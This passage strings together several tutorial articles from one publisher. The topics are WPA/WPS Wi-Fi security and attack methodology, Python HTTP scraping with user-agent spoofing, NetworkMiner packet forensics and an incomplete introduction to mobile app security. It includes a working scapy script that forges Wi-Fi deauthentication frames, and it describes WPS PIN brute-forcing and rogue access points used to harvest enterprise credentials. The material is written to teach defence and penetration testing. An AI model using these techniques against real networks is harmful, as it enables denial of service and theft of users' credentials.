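pmk1 = hashlib.pbkdf2_hmac('sha1', b'S3cretPassphrase', b'HomeWLAN', 4096, 32)
pmk2 = hashlib.pbkdf2_hmac('sha1', b'S3cretPassphrase', b'OfficeWLAN', 4096, 32)
print(pmk1 != pmk2)  # True: a rainbow table built for one SSID is useless for another

Those 4,096 iterations per candidate passphrase are also why a brute-force attack spends nearly all of its time on PMK computation.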
Furthermore, as with WEP, the more users who know a WPA/WPA2 PSK, the greater the risk of compromise—that's why it is also not an option for big, complex corporate networks. WPA/WPA2 PSK mode provides a sufficient level of security for home and small office networks only when the key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID.

Enterprise mode

As already mentioned in the previous section, using shared keys itself poses a security risk, which in the case of WPA/WPA2 highly depends on the key's length and complexity. But there are several factors in enterprise networks that should be taken into account when talking about WLAN infrastructure: flexibility, manageability, and accountability. There are various components that implement those functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers.

WPA-Enterprise, or 802.1x mode, was designed for enterprise networks where a high security level is needed and the use of an AAA server is required. In most cases, a RADIUS server is used as the AAA server, and the following EAP (Extensible Authentication Protocol) types are supported (and several more, depending on the wireless device) with WPA/WPA2 to perform authentication:

EAP-TLS
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
PEAP-TLS
EAP-FAST

You can find a simplified WPA-Enterprise authentication workflow in the following diagram:

WPA-Enterprise authentication

Depending on the EAP type configured, WPA-Enterprise can provide various authentication options. The most popular EAP type (based on our own experience in numerous pentests) is PEAPv0/EAP-MSCHAPv2, which is relatively easily integrated with existing Microsoft Active Directory infrastructures and is relatively easy to manage. But this type of WPA protection is also relatively easy to defeat by stealing and brute-forcing user credentials with a rogue access point.

The most secure EAP type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check the server's identity, and a successful attack with a rogue access point becomes possible only if there are errors in configuration or insecurities in certificate maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication, but this type of security requires additional work and resources.

WPS

Wi-Fi Protected Setup (WPS) is actually not a security mechanism but a key exchange mechanism, which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, but it turned out to be one of the biggest holes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs using one of the following methods:

PIN: Entering a PIN on a device. The PIN is usually printed on a sticker on the back side of a Wi-Fi access point.
Push button: Special buttons should be pushed on both the access point and the client device during the connection phase. Buttons on devices can be physical or virtual.
NFC: The client should bring a device close to the access point to utilize the Near Field Communication technology.
USB drive: The necessary connection information is exchanged between the access point and the device using a USB drive.

Because WPS PINs are very short and their first and second halves are validated separately, an online brute-force attack on a PIN can be completed in several hours, allowing an attacker to connect to the WLAN.
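A quick calculation shows why the split validation is so damaging (this follows from the WPS PIN format, in which the eighth digit is a checksum of the first seven):

# A full 8-digit PIN would require up to 10**8 = 100,000,000 guesses.
# WPS confirms each half separately, and the checksum digit is derived,
# so the search collapses into two tiny independent searches:
first_half = 10 ** 4   # 10,000 possibilities
second_half = 10 ** 3  # 1,000 possibilities (last digit is the checksum)
print(first_half + second_half)  # 11,000 guesses in the worst case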
Furthermore, the possibility of offline PIN cracking was discovered in 2014; it allows attackers to crack PINs in 1 to 30 seconds, but it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access the Wi-Fi router or access point can also read and use the PIN, or connect via the push-button method.

Getting familiar with the Wi-Fi attack workflow

In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without an understanding of the various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs.

General Wi-Fi attack methodology

After refreshing our knowledge of wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attacks, wireless attack workflows depend on the situation and targets, but they still align with the following general sequence in almost all cases:

The first step is planning. Normally, attackers need to plan what they are going to attack, how they can do it, which tools are necessary for the task, when is the best time and place to attack certain targets, and which configuration templates will be useful to prepare in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on the customer side, define project deliverables, and do some other organizational work if demanded. As with every penetration testing project, the better a project is planned (and we can use the word "project" for black-hat hackers' tasks too), the higher the chances of a successful result.

The next step is survey. Getting information about a target that is as accurate and complete as possible is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least the SSIDs or MAC addresses of access points and clients and information about the security type in use. It is also very helpful for an attacker to understand whether WPS is enabled on a target access point. All that data allows attackers not only to set proper configs and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical information (for example, company and department names, brands, or employee names), can also become useful at the cracking phase for building dictionaries for brute-force attacks. Depending on the type of security and the attacker's luck, the data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly to the cracking phase.

The active attacks phase involves active interaction between an attacker and the targets (WLANs and Wi-Fi clients). At this phase, attackers have to create the conditions necessary for a chosen attack type and execute it. This includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker wants to cause a denial of service in a target WLAN, such attacks are also executed at this phase.
Some active attacks are essential to successfully hack a WLAN, but others are intended just to speed up hacking and can be omitted to avoid raising alarms on wireless intrusion detection/prevention systems (wIDPS), which may be installed in a target network. Thus, the active attacks phase can be called optional.

Cracking is another important phase, where an attacker cracks the 4-way handshakes, WEP data, NTLM hashes, and so on that were intercepted in the previous phases. There are plenty of free and commercial tools and services for this, including cloud cracking services. In case of success at this phase, an attacker gets the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypting intercepted traffic, and so on.

The active attacking phase

Let's have a closer look at the most interesting parts of the active attack phase—WPA-PSK and WPA-Enterprise attacks—in the following topics.

WPA-PSK attacks

As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ—an attacker needs to sniff a 4-way handshake at the moment a connection is established between an access point and an arbitrary wireless client, and then brute-force the matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN.

Sometimes, attackers have to wait a long time until a device connects to a WLAN so they can intercept a 4-way handshake, and of course they would like to speed up the process when possible. For that purpose, they force an already connected device to disconnect from an access point by sending deauthentication frames on behalf of the target access point (a deauthentication attack). When a device receives such a frame, it disconnects from the WLAN and tries to reconnect if the automatic reconnect feature is enabled (it is enabled by default on most devices), thus performing another 4-way handshake that can be intercepted by an attacker.
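Purely as an illustration of how little such an attack requires (and strictly for use against your own lab network), a deauthentication frame can be forged in a few lines with the scapy library; the MAC addresses and the monitor-mode interface name below are placeholders:

from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

ap_mac = '00:11:22:33:44:55'      # placeholder: target access point
client_mac = '66:77:88:99:aa:bb'  # placeholder: connected client

# A deauthentication frame addressed to the client on behalf of the AP
frame = (RadioTap() /
         Dot11(addr1=client_mac, addr2=ap_mac, addr3=ap_mac) /
         Dot11Deauth(reason=7))

# Requires a wireless interface in monitor mode
sendp(frame, iface='wlan0mon', count=10, inter=0.1)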
Another possibility to hack a WPA-PSK protected network is to crack the WPS PIN, if WPS is enabled on the target WLAN.

Enterprise WLAN attacks

Attacking becomes a little more complicated if WPA-Enterprise security is in place, but it can still be executed in several minutes by a properly prepared attacker, who imitates a legitimate access point with a RADIUS server and gathers user credentials for further analysis (cracking). To stage this attack, an attacker needs to install a rogue access point with an SSID identical to the target WLAN's SSID and set the other parameters (such as the EAP type) to match the target WLAN, to increase the chances of success and reduce the probability of the attack being quickly detected.

Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by signal strength—they connect to the one with the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for the rogue access point, to override the signals from legitimate ones and make nearby devices connect to the rogue access point. A RADIUS server used during such attacks should have the capability to record authentication data, NTLM hashes, for example. From a user's perspective, being attacked in such a way just looks like being unable to connect to a WLAN for an unknown reason, and it may even go unnoticed if the user is not using the device at that moment and is just passing by the rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases.

An attacker or a penetration tester can install a rogue access point outside the range of the target WLAN. This allows the hacker to attack user devices without needing to get into a physically controlled area (for example, an office building), thus making the rogue access point unreachable and invisible to wireless IDPS systems. Such a place could be a bus or train station, a parking lot, or a café where many users of the target WLAN go with their Wi-Fi devices.

Unlike WPA-PSK, with its single key shared between all WLAN users, the Enterprise mode employs personified credentials for each user, and those credentials can be more or less complex depending on the individual user. That is why it is better to collect as many user credentials and hashes as possible, thus increasing the chances of successful cracking.

Summary

In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threats, and the common misconfigurations that lead to security breaches and allow attackers to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with mutual client and server authentication, which we are going to implement in our penetration testing lab.

Resources for Article:

Further resources on this subject:

Pentesting Using Python [article]
Advanced Wireless Sniffing [article]
Wireless and Mobile Hacks [article]

Scraping the Web with Python - Quick Start

Packt
17 Feb 2016
9 min read
In this article, we're going to acquire intelligence data from a variety of sources. We might interview people. We might steal files from a secret underground base. We might search the World Wide Web (WWW). (For more resources related to this topic, see here.)

Accessing data from the Internet

The WWW and Internet are based on a series of agreements called Request for Comments (RFC). The RFCs define the standards and protocols to interconnect different networks, that is, the rules for internetworking. The WWW is defined by a subset of these RFCs that specifies the protocols, behaviors of hosts and agents (servers and clients), and file formats, among other details.

In a way, the Internet is a controlled chaos. Most software developers agree to follow the RFCs. Some don't. If their idea is really good, it can catch on, even though it doesn't precisely follow the standards. We often see this in the way some browsers don't work with some websites. This can cause confusion and questions. We'll often have to perform both espionage and plain old debugging to figure out what's available on a given website.

Python provides a variety of modules that implement the software defined in the Internet RFCs. We'll look at some of the common protocols used to gather data through the Internet and the Python library modules that implement these protocols.

Background briefing – the TCP/IP protocols

The essential idea behind the WWW is the Internet. The essential idea behind the Internet is the TCP/IP protocol stack. The IP part of this is the internetworking protocol. This defines how messages can be routed between networks. Layered on top of IP is the TCP protocol, which connects two applications to each other. TCP connections are often made via a software abstraction called a socket. In addition to TCP, there's also UDP; it's not used as much for the kind of WWW data we're interested in.

In Python, we can use the low-level socket library to work with the TCP protocol, but we won't. A socket is a file-like object that supports open, close, input, and output operations. Our software will be much simpler if we work at a higher level of abstraction. The Python libraries that we'll use will leverage the socket concept under the hood.

The Internet RFCs define a number of protocols that build on TCP/IP sockets. These are more useful definitions of interactions between host computers (servers) and user agents (clients). We'll look at two of these: Hypertext Transfer Protocol (HTTP) and File Transfer Protocol (FTP).

Using http.client for HTTP GET

The essence of web traffic is HTTP. This is built on TCP/IP. HTTP defines two roles: host and user agent, also called server and client, respectively. We'll stick to server and client. HTTP defines a number of request types, including GET and POST. A web browser is one kind of client software we can use. This software makes GET and POST requests, and displays the results from the web server. We can do this kind of client-side processing in Python using two library modules.

The http.client module allows us to make GET and POST requests as well as PUT and DELETE. We can read the response object. Sometimes, the response is an HTML page. Sometimes, it's a graphic image. There are other things too, but we're mostly interested in text and graphics. Here's a picture of a mysterious device we've been trying to find.
We need to download this image to our computer so that we can see it and send it to our informant. It is available at http://upload.wikimedia.org/wikipedia/commons/7/72/IPhone_Internals.jpg.

Here's a picture of the currency we're supposed to track down and pay with. We need to download this image too. Here is the link: http://upload.wikimedia.org/wikipedia/en/c/c1/1drachmi_1973.jpg

Here's how we can use http.client to get these two image files:

import http.client
import contextlib

path_list = [
    "/wikipedia/commons/7/72/IPhone_Internals.jpg",
    "/wikipedia/en/c/c1/1drachmi_1973.jpg",
]
host = "upload.wikimedia.org"

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    for path in path_list:
        connection.request("GET", path)
        response = connection.getresponse()
        print("Status:", response.status)
        print("Headers:", response.getheaders())
        _, _, filename = path.rpartition("/")
        print("Writing:", filename)
        with open(filename, "wb") as image:
            image.write(response.read())

We're using http.client to handle the client side of the HTTP protocol. We're also using the contextlib module to politely disentangle our application from network resources when we're done using them. We've assigned a list of paths to the path_list variable. This example introduces list objects without providing any background. It's important that lists are surrounded by [] and the items are separated by ,. Yes, there's an extra , at the end. This is legal in Python.

We created an http.client.HTTPConnection object using the host computer name. This connection object is a little like a file; it entangles Python with operating system resources on our local computer plus a remote server. Unlike a file, an HTTPConnection object isn't a proper context manager. As we really like context managers to release our resources, we made use of the contextlib.closing() function to handle the context management details. The connection needs to be closed; the closing() function assures that this will happen by calling the connection's close() method.

For all of the paths in our path_list, we make an HTTP GET request. This is what browsers do to get the image files mentioned in an HTML page. We print a few things from each response. The status, if everything worked, will be 200. If the status is not 200, then something went wrong and we'll need to read up on the HTTP status codes to see what happened. If you use a coffee shop Wi-Fi connection, perhaps you're not logged in. You might need to open a browser to set up a connection.

An HTTP response includes headers that provide some additional details about the request and response. We've printed the headers because they can be helpful in debugging any problems we might have. One of the most useful headers is ('Content-Type', 'image/jpeg'). This confirms that we really did get an image.

We used _, _, filename = path.rpartition("/") to locate the right-most / character in the path. Recall that the partition() method locates the left-most instance. We're using the right-most one here. We assigned the directory information and separator to the variable _. Yes, _ is a legal variable name. It's easy to ignore, which makes it a handy shorthand for "we don't care". We kept the filename in the filename variable.

We create a nested context for the resulting image file. We can then read the body of the response—a collection of bytes—and write these bytes to the image file. In one quick motion, the file is ours.

The HTTP GET request is what underlies much of the WWW. Programs such as curl and wget are expansions of this example. They execute batches of GET requests to locate one or more pages of content. They can do quite a bit more, but this is the essence of extracting data from the WWW.
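One thing tools such as curl handle for us is redirects. If we wanted to deal with a 301 or 302 status ourselves, a small sketch along these lines might do (reusing the host and one path from the example above):

import http.client
import contextlib

host = "upload.wikimedia.org"
path = "/wikipedia/commons/7/72/IPhone_Internals.jpg"

with contextlib.closing(http.client.HTTPConnection(host)) as connection:
    connection.request("GET", path)
    response = connection.getresponse()
    if response.status in (301, 302, 303, 307):
        # The Location header tells us where the resource moved
        print("Redirected to:", response.getheader("Location"))
    elif response.status == 200:
        print("OK:", response.getheader("Content-Type"))
    else:
        print("Problem:", response.status, response.reason)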
Changing our client information

An HTTP GET request includes several headers in addition to the URL. In the previous example, we simply relied on the Python http.client library to supply a suitable set of default headers. There are several reasons why we might want to supply different or additional headers. First, we might want to tweak the User-Agent header to change the kind of browser that we're claiming to be. We might also need to provide cookies for some kinds of interactions. For information on the user agent string, see http://en.wikipedia.org/wiki/User_agent_string#User_agent_identification.

This information may be used by the web server to determine whether a mobile device or desktop device is being used. We can use something like this:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14

This makes our Python request appear to come from the Safari browser instead of a Python application. We can use something like this to appear to be a different browser on a desktop computer:

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0

We can use something like this to appear to be an iPhone instead of a Python application:

Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53

We make this change by adding headers to the request we're making. The change looks like this:

connection.request("GET", path, headers={
    'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
})

This will make the web server treat our Python application like it's on an iPhone. This might lead to a more compact page of data than would be provided to a full desktop computer making the same request.

The header information is a structure with the { key: value, } syntax. It's important that dictionaries are surrounded by {}, the keys and values are separated by :, and each key-value pair is separated by ,. Yes, there's an extra , at the end. This is legal in Python.

There are many more HTTP headers we can provide. The User-Agent header is perhaps the most important for gathering different kinds of intelligence data from web servers.

You can refer to more books related to this topic via the following links:

Python for Secret Agents - Volume II (https://www.packtpub.com/application-development/python-secret-agents-volume-ii)
Expert Python Programming (https://www.packtpub.com/application-development/expert-python-programming)
Raspberry Pi for Secret Agents (https://www.packtpub.com/hardware-and-creative/raspberry-pi-secret-agents)

Resources for Article:

Further resources on this subject:

Python Libraries [article]
Optimization in Python [article]
Introduction to Object-Oriented Programming using Python, JavaScript, and C# [article]

Analyzing Data Packets

Packt
08 Feb 2016
7 min read
In this article by Samir Datt, the author of the book Learning Network Forensics, you will learn to get your hands dirty by actually capturing and analyzing network traffic. We will learn how to use different software tools to capture and analyze network traffic with real-world scenarios of accessing data over the Internet and the resultant network capture. The article will cover the following topics: Packet sniffing and analysis using NetworkMiner Case study – sniffing out an insider (For more resources related to this topic, see here.) Packet sniffing and analysis using NetworkMiner NetworkMiner is a passive network sniffing or network forensic tool. It is called a passive tool as it does not send out requests—it sits silently on the network, capturing every packet in the promiscuous mode. NetworkMiner is host-centric. This means that it will classify data based on hosts rather than packets, which is what most sniffers such as Wireshark do. The different steps to NetworkMiner usage are as follows: Download and install the NetworkMiner. Then, configure it. Capture the data in NetworkMiner. Finally, analyze the data. NetworkMiner is available for download at SourceForge: http://sourceforge.net/projects/networkminer/. Though NetworkMiner is not as well known as it should be, it's host-centric approach is refreshingly different and effective. Allowing the users to classify traffic based on the IP addresses and not packets helps us to zero in on activities related to the specific computers that are under suspicion or are being investigated. The NetworkMiner interface is shown in the following screenshot: To begin using NetworkMiner, we start by selecting a network adapter from the drop-down list. NetworkMiner places this adapter in the promiscuous mode. Clicking Start begins NetworkMiner on the task of packet collection. While NetworkMiner has the capability of collecting data packets across the network, its real strength comes in to play after the data has been collected. In most of the scenarios, it makes more sense to use Wireshark to capture packets and then use NetworkMiner to do the analysis on the .pcap file that is captured. As soon as data capturing begins, NetworkMiner swings into action by sorting the packets based on the host IP addresses. This is extremely useful since it allows us to identify traffic that is specific to a single IP on the network. Consider that we have a single suspect with a known IP on the network, then we can focus our investigative resources on just that single IP address. Some really great additional features include the ability to identify the media access control (MAC) address of the network interface card (NIC) in use and also the OS of the suspect system. In fact, the icon on the left-hand side of the IP address shows the OS icon, if detected, as shown in the following screenshot: As we can see in the preceding image, some of the devices that are connected to the network under investigation are Windows and BSD devices. The next tab is the Frames tab. The Frames tab view is similar to that of Wireshark and is perhaps one of the lesser used tabs in NetworkMiner, due to the fact that there are so many other richer options available, as shown in the following screenshot: It gives us inputs on the packet length, source and destination IP address, as well as time to live (TTL) of the packet. NetworkMiner has the ability to collate the packets and then reconstruct the constituent files for viewing by the investigator. These files are shown in the Files tab. 
Assuming that some files were copied/accessed over a network share, it would be possible to view the reconstructed file in the Files tab. The Files tab also depicts the SSL certificates used over a network. This can also be useful from an investigation perspective, as shown in the following screenshot: Similarly, if pictures have been viewed over the network, these are reconstructed in the Images tab. In fact, this can be quite useful especially, when scanned documents are a part of the network traffic. This may happen when the bad guys try to avoid detection from the keyword-based searching. The following is an image depicting the Images tab: The reconstructed graphics are usually depicted as thumbnails. Right-clicking the thumbnail allows us to open the graphic in a picture editor/viewer. DNS queries are also accessible via another tab, as shown in the following image: There are additional tabs available that are notable from the perspective of an investigation. One of these is the Credentials tab. This stores the information related to interactions involving the exchange of credentials with resources that require logons. It is not uncommon to find username and passwords for plain-text logons listed under this tab. One can also find user accounts for popular sites such as Gmail and Facebook. A screenshot of the Credentials tab is as follows: In a number of cases, it is possible to determine the username and passwords of certain websites. Another great feature in NetworkMiner is the ability to import a set of keywords that are to be used to search within packets in the captured .pcap file. This allows us to separate packets that contain our keywords of interest. A screenshot is as follows: Case study – tracking down an insider XYZ Corporation, a medium-sized Government contractor, found that it had begun to lose business to a tiny competitor that seemed to know exactly what the sales team at XYZ Corp was planning. The senior management suspected that an insider was leaking information to the competitor. A network forensic 007 was called in to investigate the problem. A preliminary information-gathering exercise was initiated and a list of keywords was compiled to help in identifying packets that contained information of interest. A list of possible suspects, who had access to the confidential information, was also compiled. The specific network segment relating to the department in question was put under network surveillance. Wireshark was deployed to capture all the network traffic. Additional storage was made available to store the .pcap files generated by Wireshark. The collected .pcap files were analyzed using NetworkMiner. 
The following screenshot depicts Wireshark capturing traffic: An in-depth analysis of network traffic produced the following findings: An image showing the registration certificate of the company that was competing with XYZ Corp, providing the names of the directors The address of the company in the registration certificate was the residential address of the sales manager of XYZ Corp E-mail communications using personal e-mail addresses between the directors of the competing company and the senior manager sales of XYZ Corp Further offline analysis showed that the sales manager's wife was related to the director of the competing company It was also seen that the sales manager was connecting to the office Wi-Fi network using his android phone The sales manager was noted to be accessing cloud storage using his phone and transferring important files and contact lists It was noted that the sales manager was also in close communication with a female employee in the accounts department and that the connection was intimate The information collected so far was very indicative of the sales manager's involvement with competitors. Based on the preceding network forensics exercise, it was recommended that a full-fledged digital forensic exercise should be initiated, including that of his assigned laptop and phone device. It was also recommended that sufficient corroborating evidence should be collected using log analysis, RAM analysis, and disk forensics to initiate legal/breach of trust action against the suspect(s). Summary In this article, we moved our skills up a notch. You learned how to analyze the captured packets to see what is happening on the network. We also studied how to see the traffic from the specific IP addresses as well as protocol-specific traffic. We also understood how to look for specific traffic based on keywords. Files, private credentials, and images have been examined to identify activities of interest. We have now become a lot better at investigating network activity. Resources for Article:   Further resources on this subject: Introduction to Mobile Forensics [article] Securing vCloud Using the vCloud Networking and Security App Firewall [article] Configuring the alerts [article]
Read more
  • 0
  • 0
  • 4988

article-image-android-and-ios-apps-testing-glance
Packt
02 Feb 2016
21 min read
Save for later

Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and its current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard to classify these vulnerabilities. The readers will also get an opportunity to practice the security testing of these vulnerabilities via the means of readily available vulnerable mobile applications. The article will have a look at the step-by-step setup of the environment that's required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks. (For more resources related to this topic, see here.) Smartphones' market share Understanding smartphones' market share will give us a clear picture about what cyber criminals are after and also what could be potentially targeted. The mobile application developers can propose and publish their applications on the stores and be rewarded by a revenue share of the selling price. The following screenshot that was taken from www.idc.com provides us with the overall smartphone OS market in 2015: Since mobile applications are platform-specific, majority of the software vendors are forced to develop applications for all the available operating systems. Android operating system Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android OS is Linux-based. It can be programmed in C/C++, but most of the application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface). iPhone operating system (iOS) It was developed by Apple Inc. It was originally released in 2007 for iPhone, iPod Touch, and Apple TV. Apple's mobile version of the OS X operating system that's used in Apple computers is iOS. Berkeley Software Distribution (BSD) is UNIX-based and can be programmed in Objective C. Public Android and iOS vulnerabilities Before we proceed with different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as an operating system and covers various fundamental concepts that need to be understood to gain experience in mobile application security. 
The following table comprises year-wise operating system releases: Year Android iOS 2007/2008 1.0 iPhone OS 1 iPhone OS 2 2009 1.1 iPhone OS 3 1.5 (Cupcake) 2.0 (Eclair) 2.0.1(Eclair) 2010 2.1 (Eclair) iOS 4 2.2 (Froyo) 2.3-2.3.2(Gingerbread) 2011 2.3.4-2.3.7 (Gingerbread) iOS 5 3.0 (HoneyComb) 3.1 (HoneyComb) 3.2 (HoneyComb) 4.0-4.0.2 (Ice Cream Sandwich) 4.0.3-4.0.4 (Ice Cream Sandwich) 2012 4.1 (Jelly Bean) iOS 6 4.2 (Jelly Bean) 2013 4.3 (Jelly bean) iOS 7 4.4 (KitKat) 2014 5.0 (Lollipop) iOS 8 5.1 (Lollipop) 2015   iOS 9 (beta) An interesting research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, has reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf): 97% of the applications that were tested access at least one private information source of these applications 86% of the applications failed to use simple binary-hardening protections against modern-day attacks 75% of the applications do not use proper encryption techniques when storing data on a mobile device 71% of the vulnerabilities resided on the web server 18% of the applications sent usernames and password over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly) So, the key vulnerabilities to mobile applications arise due to a lack of security awareness, "usability versus security trade-off" by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of. Usability versus security trade-off For every developer, it would not be possible to provide users with an application with high security and usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows: Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on a transport layer, or the implemented encryption is insecure. Insecure data storage: Apps may store data either in a cleartext or obfuscated format, or hard-coded keys in the mobile device. An example e-mail exchange server configuration on Android device that uses an e-mail client stores the username and password in cleartext format, which is easy to reverse by any attacker if the device is rooted. Lack of binary protection: Apps do not enforce any anti-reversing, debugging techniques. Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on. Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage. Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and obscurity assumptions of developers. Android vulnerabilities In July 2015, a security company called Zimperium announced that it discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it as a unicorn in the world of Android risk, and it was practically demonstrated in one of the hacking conferences in the US on August 5, 2015. 
More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db/exploits/38124/. This has made Google release security patches for all Android operating systems, which is believed to be 95% of the Android devices, which is an estimated 950 million users. The vulnerability is exploited through a particular library, which can let attackers take control of an Android device by sending a specifically crafted multimedia services like Multimedia Messaging Service (MMS). If we take a look at the superuser application downloads from the Play Store, there are around 1 million to 5 million downloads. It can be assumed that a major portion of Android smartphones are rooted. The following graphs show the Android vulnerabilities from 2009 until September 2015. There are currently 54 reported vulnerabilities for the Android Google operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). More features that are introduced to the operating system in the form of applications act as additional entry points that allow cyber attackers or security researchers to circumvent and bypass the controls that were put in place. iOS vulnerabilities On June 18, 2015, password stealing vulnerability, also known as Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the security controls mechanism. It clearly provided the need to protect the cross-app mechanism between the operating system and the app developer. Apple rolled a security update week after the XARA research. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/ The following graphs show the vulnerabilities in iOS from 2007 until September 2015. There are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service attacks. This vulnerability makes the application unresponsive. Primarily, the vulnerabilities arise due to insecure libraries or overwriting with plenty of buffer in the stacks. Rooting/jailbreaking Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device. OWASP's top ten mobile risks In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks as per the result of the poll data and mobile application threat landscape: M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own. 
The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: 